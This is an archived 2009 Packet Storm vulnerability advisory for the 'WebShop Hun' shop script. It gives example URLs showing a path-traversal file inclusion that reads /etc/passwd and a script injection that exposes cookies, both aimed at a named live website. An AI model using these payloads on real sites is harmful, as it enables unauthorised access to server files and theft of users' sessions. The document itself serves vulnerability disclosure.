WebShop Hun 1.0625 File Disclosure / XSS

2009-07-24T00:00:00
ID PACKETSTORM:79611
Type packetstorm
Reporter U.F.
Modified 2009-07-24T00:00:00

Description

                                        
                                            `***********************************************************  
*  
WEB SHOP HUN (LFI/XSS) Multiple Remote Vulnerabilities *  
*  
*  
*  
***********************************************************  
  
  
[>>] Autor: U.F.   
  
[>>] Mail: expiries  
  
[>>] Script: WebShop Hun  
  
[>>] Version: v1.062S (meybe older)  
  
[>>] Price: 30.000 Ft.(hungary)  
  
[>>] Download: http://www.netprog.eu  
  
  
  
************************************************  
*  
[>>] special greetz : Jason , Bull *  
*  
************************************************  
  
  
  
Exploit Info :  
  
  
--LFI--  
  
  
Example: http://india-biocosmetics.com/index.php?param=1&nyelv_id=4&mappa=../../../../../../../etc/passwd%00  
  
  
  
--XSS--  
  
  
Example: http://india-biocosmetics.com/index.php?param=1&lap=<script>alert(document.cookie)</script>&bejelentkezes=nincs`